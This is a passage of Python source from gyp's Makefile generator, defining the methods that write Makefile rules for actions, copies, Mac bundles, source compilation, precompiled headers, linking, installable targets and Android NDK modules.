if len(dirs) > 0:
mkdirs = 'mkdir -p %s; ' % ' '.join(dirs)
cd_action = 'cd %s; ' % Sourceify(self.path or '.')
# action, cd_action, and mkdirs get written to a toplevel variable
# called cmd_foo. Toplevel variables can't handle things that change
# per makefile like $(TARGET), so hardcode the target.
if self.flavor == 'mac':
action = [gyp.xcode_emulation.ExpandEnvVars(command, env)
for command in action]
action = gyp.common.EncodePOSIXShellList(action)
action = action.replace('$(TARGET)', self.target)
cd_action = cd_action.replace('$(TARGET)', self.target)
mkdirs = mkdirs.replace('$(TARGET)', self.target)
# Set LD_LIBRARY_PATH in case the rule runs an executable from this
# build which links to shared libs from this build.
# rules run on the host, so they should in theory only use host
# libraries, but until everything is made cross-compile safe, also use
# target libraries.
# TODO(piman): when everything is cross-compile safe, remove lib.target
self.WriteLn(
"cmd_%(name)s_%(count)d = LD_LIBRARY_PATH="
"$(builddir)/lib.host:$(builddir)/lib.target:$$LD_LIBRARY_PATH; "
"export LD_LIBRARY_PATH; "
"%(cd_action)s%(mkdirs)s%(action)s" % {
'action': action,
'cd_action': cd_action,
'count': count,
'mkdirs': mkdirs,
'name': name,
})
self.WriteLn(
'quiet_cmd_%(name)s_%(count)d = RULE %(name)s_%(count)d $@' % {
'count': count,
'name': name,
})
self.WriteLn()
count += 1
outputs_variable = 'rule_%s_outputs' % name
self.WriteList(all_outputs, outputs_variable)
extra_outputs.append('$(%s)' % outputs_variable)
self.WriteLn('### Finished generating for rule: %s' % name)
self.WriteLn()
self.WriteLn('### Finished generating for all rules')
self.WriteLn('')
def WriteCopies(self, copies, extra_outputs, part_of_all):
"""Write Makefile code for any 'copies' from the gyp input.
extra_outputs: a list that will be filled in with any outputs of this action
(used to make other pieces dependent on this action)
part_of_all: flag indicating this target is part of 'all'
"""
self.WriteLn('### Generated for copy rule.')
variable = StringToMakefileVariable(self.qualified_target + '_copies')
outputs = []
for copy in copies:
for path in copy['files']:
# Absolutify() may call normpath, and will strip trailing slashes.
path = Sourceify(self.Absolutify(path))
filename = os.path.split(path)[1]
output = Sourceify(self.Absolutify(os.path.join(copy['destination'],
filename)))
# If the output path has variables in it, which happens in practice for
# 'copies', writing the environment as target-local doesn't work,
# because the variables are already needed for the target name.
# Copying the environment variables into global make variables doesn't
# work either, because then the .d files will potentially contain spaces
# after variable expansion, and .d file handling cannot handle spaces.
# As a workaround, manually expand variables at gyp time. Since 'copies'
# can't run scripts, there's no need to write the env then.
# WriteDoCmd() will escape spaces for .d files.
env = self.GetSortedXcodeEnv()
output = gyp.xcode_emulation.ExpandEnvVars(output, env)
path = gyp.xcode_emulation.ExpandEnvVars(path, env)
self.WriteDoCmd([output], [path], 'copy', part_of_all)
outputs.append(output)
self.WriteLn('%s = %s' % (variable, ' '.join(map(QuoteSpaces, outputs))))
extra_outputs.append('$(%s)' % variable)
self.WriteLn()
def WriteMacBundleResources(self, resources, bundle_deps):
"""Writes Makefile code for 'mac_bundle_resources'."""
self.WriteLn('### Generated for mac_bundle_resources')
product_dir = generator_default_variables['PRODUCT_DIR']
sources = map(Sourceify, map(self.Absolutify, resources))
bundle_resources = gyp.xcode_emulation.GetMacBundleResources(product_dir, self.xcode_settings, sources)
for output, res in bundle_resources:
_, ext = os.path.splitext(output)
# TODO(refack): actualy figure this out for `copy-bundle-resource`
# is_binary = xcode_emulation.IsBinaryOutputFormat(output)
if ext != '.xcassets':
# Make does not supports '.xcassets' emulation.
self.WriteDoCmd([output], [res], 'mac_tool,,,copy-bundle-resource', part_of_all=True)
bundle_deps.append(output)
def WriteMacInfoPlist(self, bundle_deps):
"""Write Makefile code for bundle Info.plist files."""
info_plist, out, defines, extra_env = gyp.xcode_emulation.GetMacInfoPlist(
generator_default_variables['PRODUCT_DIR'], self.xcode_settings,
lambda p: Sourceify(self.Absolutify(p)))
if not info_plist:
return
if defines:
# Create an intermediate file to store preprocessed results.
intermediate_plist = ('$(obj).$(TOOLSET)/$(TARGET)/' + os.path.basename(info_plist))
self.WriteList(defines, intermediate_plist + ': INFOPLIST_DEFINES', '-D', quoter=EscapeCppDefine)
self.WriteMakeRule([intermediate_plist], [info_plist],
['$(call do_cmd,infoplist)',
# "Convert" the plist so that any weird whitespace changes from the
# preprocessor do not affect the XML parser in mac_tool.
'@plutil -convert xml1 $@ $@'])
info_plist = intermediate_plist
# plists can contain envvars and substitute them into the file.
self.WriteSortedXcodeEnv(out, self.GetSortedXcodeEnv(additional_settings=extra_env))
self.WriteDoCmd([out], [info_plist], 'mac_tool,,,copy-info-plist', part_of_all=True)
bundle_deps.append(out)
def WriteSources(self, configs, deps, sources, extra_outputs, extra_link_deps, precompiled_header):
"""Write Makefile code for any 'sources' from the gyp input.
These are source files necessary to build the current target.
configs, deps, sources: input from gyp.
extra_outputs: a list of extra outputs this action should be dependent on;
used to serialize action/rules before compilation
extra_link_deps: a list that will be filled in with any outputs of
compilation (to be used in link lines)
"""
# Write configuration-specific variables for CFLAGS, etc.
for configname in sorted(configs.keys()):
config = configs[configname]
self.WriteList(config.get('defines'), 'DEFS_%s' % configname, prefix='-D', quoter=EscapeCppDefine)
if self.flavor == 'mac':
cflags = self.xcode_settings.GetCflags(configname)
cflags_c = self.xcode_settings.GetCflagsC(configname)
cflags_cc = self.xcode_settings.GetCflagsCC(configname)
cflags_objc = self.xcode_settings.GetCflagsObjC(configname)
cflags_objcc = self.xcode_settings.GetCflagsObjCC(configname)
else:
cflags = config.get('cflags')
cflags_c = config.get('cflags_c')
cflags_cc = config.get('cflags_cc')
cflags_objc = None
cflags_objcc = None
self.WriteLn("# Flags passed to all source files.")
self.WriteList(cflags, 'CFLAGS_%s' % configname)
self.WriteLn("# Flags passed to only C files.")
self.WriteList(cflags_c, 'CFLAGS_C_%s' % configname)
self.WriteLn("# Flags passed to only C++ files.")
self.WriteList(cflags_cc, 'CFLAGS_CC_%s' % configname)
if self.flavor == 'mac':
self.WriteLn("# Flags passed to only ObjC files.")
self.WriteList(cflags_objc, 'CFLAGS_OBJC_%s' % configname)
self.WriteLn("# Flags passed to only ObjC++ files.")
self.WriteList(cflags_objcc, 'CFLAGS_OBJCC_%s' % configname)
includes = config.get('include_dirs')
if includes:
includes = [Sourceify(self.Absolutify(include)) for include in includes]
self.WriteList(includes, 'INCS_%s' % configname, prefix='-I')
        # Materialize the filter: this sequence is iterated more than once below.
        compilable = list(filter(Compilable, sources))
objs = [self.Objectify(self.Absolutify(Target(x))) for x in compilable]
self.WriteList(objs, 'OBJS')
for obj in objs:
assert ' ' not in obj, (
"Spaces in object filenames not supported (%s)" % obj)
self.WriteLn('# Add to the list of files we specially track '
'dependencies for.')
self.WriteLn('all_deps += $(OBJS)')
self.WriteLn()
# Make sure our dependencies are built first.
if deps:
self.WriteMakeRule(['$(OBJS)'], deps,
comment='Make sure our dependencies are built before any of us.',
order_only=True)
# Make sure the actions and rules run first.
# If they generate any extra headers etc., the per-.o file dep tracking
# will catch the proper rebuilds, so order only is still ok here.
if extra_outputs:
self.WriteMakeRule(['$(OBJS)'], extra_outputs,
comment='Make sure our actions/rules run before any of us.',
order_only=True)
pchdeps = precompiled_header.GetObjDependencies(compilable, objs)
if pchdeps:
self.WriteLn('# Dependencies from obj files to their precompiled headers')
for source, obj, gch in pchdeps:
self.WriteLn('%s: %s' % (obj, gch))
self.WriteLn('# End precompiled header dependencies')
if objs:
extra_link_deps.append('$(OBJS)')
self.WriteLn("""\
# CFLAGS et al overrides must be target-local.
# See "Target-specific Variable Values" in the GNU Make manual.""")
self.WriteLn("$(OBJS): TOOLSET := $(TOOLSET)")
self.WriteLn("$(OBJS): GYP_CFLAGS := "
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('c') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_C_$(BUILDTYPE))")
self.WriteLn("$(OBJS): GYP_CXXFLAGS := "
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('cc') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_CC_$(BUILDTYPE))")
if self.flavor == 'mac':
self.WriteLn("$(OBJS): GYP_OBJCFLAGS := "
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('m') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_C_$(BUILDTYPE)) "
"$(CFLAGS_OBJC_$(BUILDTYPE))")
self.WriteLn("$(OBJS): GYP_OBJCXXFLAGS := "
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"%s " % precompiled_header.GetInclude('mm') +
"$(CFLAGS_$(BUILDTYPE)) "
"$(CFLAGS_CC_$(BUILDTYPE)) "
"$(CFLAGS_OBJCC_$(BUILDTYPE))")
self.WritePchTargets(precompiled_header.GetPchBuildCommands())
# If there are any object files in our input file list, link them into our
# output.
extra_link_deps += [source for source in sources if Linkable(source)]
self.WriteLn()
def WritePchTargets(self, pch_commands):
"""Writes make rules to compile prefix headers."""
if not pch_commands:
return
for gch, lang_flag, lang, inpt in pch_commands:
extra_flags = {
'c': '$(CFLAGS_C_$(BUILDTYPE))',
'cc': '$(CFLAGS_CC_$(BUILDTYPE))',
'm': '$(CFLAGS_C_$(BUILDTYPE)) $(CFLAGS_OBJC_$(BUILDTYPE))',
'mm': '$(CFLAGS_CC_$(BUILDTYPE)) $(CFLAGS_OBJCC_$(BUILDTYPE))',
}[lang]
var_name = {
'c': 'GYP_PCH_CFLAGS',
'cc': 'GYP_PCH_CXXFLAGS',
'm': 'GYP_PCH_OBJCFLAGS',
'mm': 'GYP_PCH_OBJCXXFLAGS',
}[lang]
self.WriteLn("%s: %s := %s " % (gch, var_name, lang_flag) +
"$(DEFS_$(BUILDTYPE)) "
"$(INCS_$(BUILDTYPE)) "
"$(CFLAGS_$(BUILDTYPE)) " +
extra_flags)
self.WriteLn('%s: %s FORCE_DO_CMD' % (gch, inpt))
self.WriteLn('\t@$(call do_cmd,pch_%s,1)' % lang)
self.WriteLn('')
assert ' ' not in gch, (
"Spaces in gch filenames not supported (%s)" % gch)
self.WriteLn('all_deps += %s' % gch)
self.WriteLn('')
def ComputeOutputBasename(self, spec):
"""Return the 'output basename' of a gyp spec.
E.g., the loadable module 'foobar' in directory 'baz' will produce
'libfoobar.so'
"""
assert not self.is_mac_bundle
if self.flavor == 'mac' and self.type in (
'static_library', 'executable', 'shared_library', 'loadable_module'):
return self.xcode_settings.GetExecutablePath()
target = spec['target_name']
target_prefix = ''
target_ext = ''
if self.type == 'static_library':
if target[:3] == 'lib':
target = target[3:]
target_prefix = 'lib'
target_ext = '.a'
elif self.type in ('loadable_module', 'shared_library'):
if target[:3] == 'lib':
target = target[3:]
target_prefix = 'lib'
if self.flavor == 'aix':
target_ext = '.a'
else:
target_ext = '.so'
elif self.type == 'none':
target = '%s.stamp' % target
elif self.type != 'executable':
print(("ERROR: What output file should be generated?",
"type", self.type, "target", target))
target_prefix = spec.get('product_prefix', target_prefix)
target = spec.get('product_name', target)
product_ext = spec.get('product_extension')
if product_ext:
target_ext = '.' + product_ext
return target_prefix + target + target_ext
def _InstallImmediately(self):
return self.toolset == 'target' and self.flavor == 'mac' and self.type in ('static_library', 'executable', 'shared_library', 'loadable_module')
def ComputeOutput(self, spec):
"""Return the 'output' (full output path) of a gyp spec.
E.g., the loadable module 'foobar' in directory 'baz' will produce
'$(obj)/baz/libfoobar.so'
"""
assert not self.is_mac_bundle
path = os.path.join('$(obj).' + self.toolset, self.path)
if self.type == 'executable' or self._InstallImmediately():
path = '$(builddir)'
path = spec.get('product_dir', path)
return os.path.join(path, self.ComputeOutputBasename(spec))
def ComputeMacBundleOutput(self):
"""Return the 'output' (full output path) to a bundle output directory."""
assert self.is_mac_bundle
path = generator_default_variables['PRODUCT_DIR']
return os.path.join(path, self.xcode_settings.GetWrapperName())
def ComputeMacBundleBinaryOutput(self):
"""Return the 'output' (full output path) to the binary in a bundle."""
path = generator_default_variables['PRODUCT_DIR']
return os.path.join(path, self.xcode_settings.GetExecutablePath())
@staticmethod
def ComputeDeps(spec):
"""Compute the dependencies of a gyp spec.
Returns a tuple (deps, link_deps), where each is a list of
filenames that will need to be put in front of make for either
building (deps) or linking (link_deps).
"""
deps = []
link_deps = []
if 'dependencies' in spec:
deps.extend([target_outputs[dep] for dep in spec['dependencies']
if target_outputs[dep]])
for dep in spec['dependencies']:
if dep in target_link_deps:
link_deps.append(target_link_deps[dep])
deps.extend(link_deps)
# TODO: It seems we need to transitively link in libraries (e.g. -lfoo)?
# This hack makes it work:
# link_deps.extend(spec.get('libraries', []))
return gyp.common.uniquer(deps), gyp.common.uniquer(link_deps)
def WriteDependencyOnExtraOutputs(self, extra_outputs):
self.WriteMakeRule([self.output_binary], extra_outputs, comment='Build our special outputs first.', order_only=True)
def WriteTarget(self, spec, configs, deps, link_deps, bundle_deps, extra_outputs, part_of_all):
"""
Write Makefile code to produce the final target of the gyp spec.
spec: input from gyp.
configs: input from gyp.
deps: dependency lists; see ComputeDeps()
link_deps: dependency lists; see ComputeDeps()
extra_outputs: any extra outputs that our target should depend on
part_of_all: flag indicating this target is part of 'all'
"""
self.WriteLn('### Rules for final target.')
if extra_outputs:
self.WriteDependencyOnExtraOutputs(extra_outputs)
self.WriteMakeRule(extra_outputs, deps, comment='Preserve order dependency of special output on deps.', order_only=True)
target_postbuilds = {}
if self.type != 'none':
for configname in sorted(configs.keys()):
config = configs[configname]
if self.flavor == 'mac':
ldflags = self.xcode_settings.GetLdflags(configname,
generator_default_variables['PRODUCT_DIR'],
lambda p: Sourceify(self.Absolutify(p)))
# TARGET_POSTBUILDS_$(BUILDTYPE) is added to postbuilds later on.
gyp_to_build = gyp.common.InvertRelativePath(self.path)
target_postbuild = self.xcode_settings.AddImplicitPostbuilds(
configname,
QuoteSpaces(os.path.normpath(os.path.join(gyp_to_build, self.output))),
QuoteSpaces(os.path.normpath(os.path.join(gyp_to_build, self.output_binary))))
if target_postbuild:
target_postbuilds[configname] = target_postbuild
else:
ldflags = config.get('ldflags', [])
# Compute an rpath for this output if needed.
if any(dep.endswith('.so') or '.so.' in dep for dep in deps):
# We want to get the literal string "$ORIGIN" into the link command,
# so we need lots of escaping.
ldflags.append(r'-Wl,-rpath=\$$ORIGIN/lib.%s/' % self.toolset)
ldflags.append(r'-Wl,-rpath-link=\$(builddir)/lib.%s/' %
self.toolset)
library_dirs = config.get('library_dirs', [])
ldflags += [('-L%s' % library_dir) for library_dir in library_dirs]
self.WriteList(ldflags, 'LDFLAGS_%s' % configname)
if self.flavor == 'mac':
self.WriteList(self.xcode_settings.GetLibtoolflags(configname),
'LIBTOOLFLAGS_%s' % configname)
libraries = spec.get('libraries')
if libraries:
# Remove duplicate entries
libraries = gyp.common.uniquer(libraries)
if self.flavor == 'mac':
libraries = self.xcode_settings.AdjustLibraries(libraries)
self.WriteList(libraries, 'LIBS')
self.WriteLn('%s: GYP_LDFLAGS := $(LDFLAGS_$(BUILDTYPE))' % QuoteSpaces(self.output_binary))
self.WriteLn('%s: LIBS := $(LIBS)' % QuoteSpaces(self.output_binary))
if self.flavor == 'mac':
self.WriteLn('%s: GYP_LIBTOOLFLAGS := $(LIBTOOLFLAGS_$(BUILDTYPE))' % QuoteSpaces(self.output_binary))
# Postbuild actions. Like actions, but implicitly depend on the target's
# output.
postbuilds = []
if self.flavor == 'mac':
if target_postbuilds:
postbuilds.append('$(TARGET_POSTBUILDS_$(BUILDTYPE))')
postbuilds.extend(gyp.xcode_emulation.GetSpecPostbuildCommands(spec))
if postbuilds:
# Envvars may be referenced by TARGET_POSTBUILDS_$(BUILDTYPE),
# so we must output its definition first, since we declare variables
# using ":=".
self.WriteSortedXcodeEnv(self.output, self.GetSortedXcodePostbuildEnv())
for configname in target_postbuilds:
self.WriteLn('%s: TARGET_POSTBUILDS_%s := %s' % (QuoteSpaces(self.output), configname, gyp.common.EncodePOSIXShellList(target_postbuilds[configname])))
# Postbuilds expect to be run in the gyp file's directory, so insert an
# implicit postbuild to cd to there.
postbuilds.insert(0, gyp.common.EncodePOSIXShellList(['cd', self.path]))
for i, postbuild in enumerate(postbuilds):
if not postbuild.startswith('$'):
postbuilds[i] = EscapeShellArgument(postbuild)
self.WriteLn('%s: builddir := $(abs_builddir)' % QuoteSpaces(self.output))
self.WriteLn('%s: POSTBUILDS := %s' % (
QuoteSpaces(self.output), ' '.join(postbuilds)))
# A bundle directory depends on its dependencies such as bundle resources
# and bundle binary. When all dependencies have been built, the bundle
# needs to be packaged.
if self.is_mac_bundle:
# If the framework doesn't contain a binary, then nothing depends
# on the actions -- make the framework depend on them directly too.
self.WriteDependencyOnExtraOutputs(extra_outputs)
# Bundle dependencies. Note that the code below adds actions to this
# target, so if you move these two lines, move the lines below as well.
self.WriteList(map(QuoteSpaces, bundle_deps), 'BUNDLE_DEPS')
self.WriteLn('%s: $(BUNDLE_DEPS)' % QuoteSpaces(self.output))
# After the framework is built, package it. Needs to happen before
# postbuilds, since postbuilds depend on this.
if self.type in ('shared_library', 'loadable_module'):
self.WriteLn('\t@$(call do_cmd,mac_package_framework,,,%s)' % self.xcode_settings.GetFrameworkVersion())
# Bundle postbuilds can depend on the whole bundle, so run them after
            # the bundle is packaged, not merely after the bundle binary is done.
if postbuilds:
self.WriteLn('\t@$(call do_postbuilds)')
postbuilds = [] # Don't write postbuilds for target's output.
# Needed by test/mac/gyptest-rebuild.py.
self.WriteLn('\t@true # No-op, used by tests')
# Since this target depends on binary and resources which are in
# nested subfolders, the framework directory will be older than
# its dependencies usually. To prevent this rule from executing
            # on every build (expensive, especially with postbuilds), explicitly
# update the time on the framework directory.
self.WriteLn('\t@touch -c %s' % QuoteSpaces(self.output))
if postbuilds:
assert not self.is_mac_bundle, ('Postbuilds for bundles should be done on the bundle, not the binary (target \'%s\')' % self.target)
assert 'product_dir' not in spec, 'Postbuilds do not work with custom product_dir'
if self.type == 'executable':
self.WriteLn('%s: LD_INPUTS := %s' % (QuoteSpaces(self.output_binary), ' '.join(map(QuoteSpaces, link_deps))))
if self.toolset == 'host' and self.flavor == 'android':
self.WriteDoCmd([self.output_binary], link_deps, 'link_host', part_of_all, postbuilds=postbuilds)
else:
self.WriteDoCmd([self.output_binary], link_deps, 'link', part_of_all, postbuilds=postbuilds)
elif self.type == 'static_library':
for link_dep in link_deps:
assert ' ' not in link_dep, ("Spaces in alink input filenames not supported (%s)" % link_dep)
if (self.flavor not in ('mac', 'openbsd', 'netbsd', 'win') and not
self.is_standalone_static_library):
self.WriteDoCmd([self.output_binary], link_deps, 'alink_thin', part_of_all, postbuilds=postbuilds)
else:
self.WriteDoCmd([self.output_binary], link_deps, 'alink', part_of_all, postbuilds=postbuilds)
elif self.type == 'shared_library':
self.WriteLn('%s: LD_INPUTS := %s' % (QuoteSpaces(self.output_binary), ' '.join(map(QuoteSpaces, link_deps))))
self.WriteDoCmd([self.output_binary], link_deps, 'solink', part_of_all, postbuilds=postbuilds)
elif self.type == 'loadable_module':
for link_dep in link_deps:
assert ' ' not in link_dep, ("Spaces in module input filenames not supported (%s)" % link_dep)
if self.toolset == 'host' and self.flavor == 'android':
self.WriteDoCmd([self.output_binary], link_deps, 'solink_module_host', part_of_all, postbuilds=postbuilds)
else:
self.WriteDoCmd([self.output_binary], link_deps, 'solink_module', part_of_all, postbuilds=postbuilds)
elif self.type == 'none':
# Write a stamp line.
self.WriteDoCmd([self.output_binary], deps, 'touch', part_of_all, postbuilds=postbuilds)
else:
print("WARNING: no output for", self.type, self.target)
# Add an alias for each target (if there are any outputs).
# Installable target aliases are created below.
if ((self.output and self.output != self.target) and
(self.type not in self._INSTALLABLE_TARGETS)):
self.WriteMakeRule([self.target], [self.output], comment='Add target alias', phony=True)
if part_of_all:
self.WriteMakeRule(['all'], [self.target], comment='Add target alias to "all" target.', phony=True)
# Add special-case rules for our installable targets.
# 1) They need to install to the build dir or "product" dir.
# 2) They get shortcuts for building (e.g. "make chrome").
# 3) They are part of "make all".
if (self.type in self._INSTALLABLE_TARGETS or
self.is_standalone_static_library):
if self.type == 'shared_library':
file_desc = 'shared library'
elif self.type == 'static_library':
file_desc = 'static library'
else:
file_desc = 'executable'
install_path = self._InstallableTargetInstallPath()
installable_deps = [self.output]
if (self.flavor == 'mac' and not 'product_dir' in spec and
self.toolset == 'target'):
# On mac, products are created in install_path immediately.
assert install_path == self.output, '%s != %s' % (install_path, self.output)
# Point the target alias to the final binary output.
self.WriteMakeRule([self.target], [install_path],
comment='Add target alias', phony=True)
if install_path != self.output:
assert not self.is_mac_bundle # See comment a few lines above.
self.WriteDoCmd([install_path], [self.output], 'copy', comment='Copy this to the %s output path.' % file_desc, part_of_all=part_of_all)
installable_deps.append(install_path)
if self.output != self.alias and self.alias != self.target:
self.WriteMakeRule([self.alias], installable_deps, comment='Short alias for building this %s.' % file_desc, phony=True)
if part_of_all:
self.WriteMakeRule(['all'], [install_path], comment='Add %s to "all" target.' % file_desc, phony=True)
def WriteList(self, value_list, variable=None, prefix='', quoter=QuoteIfNecessary):
"""
Write a variable definition that is a list of values.
E.g. WriteList(['a','b'], 'foo', prefix='blah') writes out
foo = blaha blahb
but in a pretty-printed style.
"""
values = ''
if value_list:
value_list = [quoter(prefix + l) for l in value_list]
values = ' \\\n\t' + ' \\\n\t'.join(value_list)
self.fp.write('%s :=%s\n\n' % (variable, values))
# TODO(refack) `part_of_all` is not used, but is part of signature used in many other places
# noinspection PyUnusedLocal
def WriteDoCmd(self, outputs, inputs, command, part_of_all=False, comment=None, postbuilds=None):
"""
Write a Makefile rule that uses do_cmd.
This makes the outputs dependent on the command line that was run,
as well as support the V= make command line flag.
"""
suffix = ''
if postbuilds:
assert ',' not in command
suffix = ',,1' # Tell do_cmd to honor $POSTBUILDS
self.WriteMakeRule(
outputs,
inputs,
actions=['$(call do_cmd,%s%s)' % (command, suffix)],
comment=comment,
command=command,
force=True
)
# Add our outputs to the list of targets we read depfiles from.
# all_deps is only used for deps file reading, and for deps files we replace
# spaces with ? because escaping doesn't work with make's $(sort) and
# other functions.
outputs = [QuoteSpaces(o, SPACE_REPLACEMENT) for o in outputs]
self.WriteLn('all_deps += %s' % ' '.join(outputs))
def WriteMakeRule(self, outputs, inputs, actions=None, comment=None, order_only=False, force=False, phony=False, command=None):
"""
Write a Makefile rule, with some extra tricks.
outputs: a list of outputs for the rule (note: this is not directly
supported by make; see comments below)
inputs: a list of inputs for the rule
actions: a list of shell commands to run for the rule
comment: a comment to put in the Makefile above the rule (also useful
for making this Python script's code self-documenting)
order_only: if true, makes the dependency order-only
force: if true, include FORCE_DO_CMD as an order-only dep
phony: if true, the rule does not actually generate the named output, the
output is just a name to run the rule
command: (optional) command name to generate unambiguous labels
"""
outputs = [QuoteSpaces(o) for o in outputs]
inputs = map(QuoteSpaces, inputs)
if comment:
self.WriteLn('# ' + comment)
if phony:
self.WriteLn('.PHONY: ' + ' '.join(outputs))
if actions:
self.WriteLn("%s: TOOLSET := $(TOOLSET)" % outputs[0])
force_append = ' FORCE_DO_CMD' if force else ''
if order_only:
# Order only rule: Just write a simple rule.
# TODO(evanm): just make order_only a list of deps instead of this hack.
self.WriteLn('%s: | %s%s' % (' '.join(outputs), ' '.join(inputs), force_append))
elif len(outputs) == 1:
# Regular rule, one output: Just write a simple rule.
self.WriteLn('%s: %s%s' % (outputs[0], ' '.join(inputs), force_append))
else:
# Regular rule, more than one output: Multiple outputs are tricky in make. We will write three rules:
# - All outputs depend on an intermediate file.
# - Make .INTERMEDIATE depend on the intermediate.
# - The intermediate file depends on the inputs and executes the actual command.
# - The intermediate recipe will 'touch' the intermediate file.
# - The multi-output rule will have a do-nothing recipe.
# Hash the target name to avoid generating overlong filenames.
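            # Illustrative sketch of the emitted rules (file and command names
            # are examples only) for outputs "a.h b.h" generated from "gen.py"
            # by a command named "foo":
            #   a.h b.h: <sha1>.foo.intermediate
            #       @:
            #   .INTERMEDIATE: <sha1>.foo.intermediate
            #   <sha1>.foo.intermediate: gen.py
            #       $(call do_cmd,touch)
            #       <original actions>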
            key = command if command else self.target
            # Keep a short, filesystem-safe slug of the name for readability.
            slug = re.sub(r'\W', '', key)
            cmddigest = hashlib.sha1(key.encode('utf-8')).hexdigest()
intermediate = "%s.%s.intermediate" % (cmddigest, slug)
self.WriteLn('%s: %s' % (' '.join(outputs), intermediate))
self.WriteLn('\t%s' % '@:')
self.WriteLn('%s: %s' % ('.INTERMEDIATE', intermediate))
self.WriteLn('%s: %s%s' % (intermediate, ' '.join(inputs), force_append))
actions.insert(0, '$(call do_cmd,touch)')
if actions:
for action in actions:
self.WriteLn('\t%s' % action)
self.WriteLn()
def WriteAndroidNdkModuleRule(self, module_name, all_sources, link_deps):
"""Write a set of LOCAL_XXX definitions for Android NDK.
These variable definitions will be used by Android NDK but do nothing for
non-Android applications.
Arguments:
module_name: Android NDK module name, which must be unique among all
module names.
all_sources: A list of source files (will be filtered by Compilable).
link_deps: A list of link dependencies, which must be sorted in
the order from dependencies to dependents.
"""
if self.type not in ('executable', 'shared_library', 'static_library'):
return
self.WriteLn('# Variable definitions for Android applications')
self.WriteLn('include $(CLEAR_VARS)')
self.WriteLn('LOCAL_MODULE := ' + module_name)
self.WriteLn('LOCAL_CFLAGS := $(CFLAGS_$(BUILDTYPE)) '
'$(DEFS_$(BUILDTYPE)) '
# LOCAL_CFLAGS is applied to both of C and C++. There is
# no way to specify $(CFLAGS_C_$(BUILDTYPE)) only for C
# sources.
'$(CFLAGS_C_$(BUILDTYPE)) '
# $(INCS_$(BUILDTYPE)) includes the prefix '-I' while
# LOCAL_C_INCLUDES does not expect it. So put it in
# LOCAL_CFLAGS.
'$(INCS_$(BUILDTYPE))')
# LOCAL_CXXFLAGS is obsolete and LOCAL_CPPFLAGS is preferred.
self.WriteLn('LOCAL_CPPFLAGS := $(CFLAGS_CC_$(BUILDTYPE))')
self.WriteLn('LOCAL_C_INCLUDES :=')
self.WriteLn('LOCAL_LDLIBS := $(LDFLAGS_$(BUILDTYPE)) $(LIBS)')
# Detect the C++ extension.
cpp_ext = {'.cc': 0, '.cpp': 0, '.cxx': 0}
default_cpp_ext = '.cpp'
for filename in all_sources:
ext = os.path.splitext(filename)[1]
if ext in cpp_ext:
cpp_ext[ext] += 1
if cpp_ext[ext] > cpp_ext[default_cpp_ext]:
default_cpp_ext = ext
self.WriteLn('LOCAL_CPP_EXTENSION := ' + default_cpp_ext)
self.WriteList(map(self.Absolutify, filter(Compilable, all_sources)),
'LOCAL_SRC_FILES')
# Filter out those which do not match prefix and suffix and produce
# the resulting list without prefix and suffix.
def DepsToModules(deps, prefix, suffix):
modules = []
for filepath in deps:
mod_filename = os.path.basename(filepath)
if mod_filename.startswith(prefix) and mod_filename.endswith(suffix):
modules.append(mod_filename[len(prefix):-len(suffix)])
return modules
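        # For example (illustrative): DepsToModules(['out/libfoo.so'], 'lib', '.so') -> ['foo'].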
# Retrieve the default value of 'SHARED_LIB_SUFFIX'
params = {'flavor': 'linux'}
default_variables = {}
CalculateVariables(default_variables, params)
self.WriteList(
DepsToModules(link_deps, generator_default_variables['SHARED_LIB_PREFIX'], default_variables['SHARED_LIB_SUFFIX']),
'LOCAL_SHARED_LIBRARIES')
self.WriteList(
DepsToModules(link_deps, generator_default_variables['STATIC_LIB_PREFIX'], generator_default_variables['STATIC_LIB_SUFFIX']),
'LOCAL_STATIC_LIBRARIES')
if self.type == 'executable':
self.WriteLn('include $(BUILD_EXECUTABLE)')
elif self.type == 'shared_library':
self.WriteLn('include $(BUILD_SHARED_LIBRARY)')
elif self.type == 'static_library':
self.WriteLn('include $(BUILD_STATIC_LIBRARY)')
self.WriteLn()
def WriteLn(self, text=''):
self.fp.write(text + '\n')
def GetSortedXcodeEnv(self, additional_settings=None):
return gyp.xcode_emulation.GetSortedXcodeEnv(self.xcode_settings, "$(abs_builddir)", os.path.join("$(abs_srcdir)", self.path), "$(BUILDTYPE)", additional_settings)
def GetSortedXcodePostbuildEnv(self):
# CHROMIUM_STRIP_SAVE_FILE is a chromium-specific hack.
# TODO(thakis): It would be nice to have some general mechanism instead.
strip_save_file = self.xcode_settings.GetPerTargetSetting('CHROMIUM_STRIP_SAVE_FILE', '')
# Even if strip_save_file is empty, explicitly write it. Else a postbuild
# might pick up an export from an earlier target.
return self.GetSortedXcodeEnv(additional_settings={'CHROMIUM_STRIP_SAVE_FILE': strip_save_file})
def WriteSortedXcodeEnv(self, target, env):
for k, v in env:
# For
# foo := a\ b
# the escaped space does the right thing. For
# export foo := a\ b
# it does not -- the backslash is written to the env as literal character.
# So don't escape spaces in |env[k]|.
self.WriteLn('%s: export %s := %s' % (QuoteSpaces(target), k, v))
def Objectify(self, path):
"""Convert a path to its output directory form."""
if '$(' in path:
path = path.replace('$(obj)/', '$(obj).%s/$(TARGET)/' % self.toolset)
if not '$(obj)' in path:
path = '$(obj).%s/$(TARGET)/%s' % (self.toolset, path)
return path
def Pchify(self, path, lang):
"""Convert a prefix header path to its output directory form."""
path = self.Absolutify(path)
if '$(' in path:
path = path.replace('$(obj)/', '$(obj).%s/$(TARGET)/pch-%s' %
(self.toolset, lang))
            return path
return '$(obj).%s/$(TARGET)/pch-%s/%s' % (self.toolset, lang, path)
def Absolutify(self, path):
"""Convert a subdirectory-relative path into a base-relative path.
Skips over paths that contain variables."""
if '$(' in path:
# Don't call normpath in this case, as it might collapse the
# path too aggressively if it features '..'. However it's still
# important to strip trailing slashes.
return path.rstrip('/')
return os.path.normpath(os.path.join(self.path, path))
@staticmethod
def ExpandInputRoot(template, expansion, dirname):
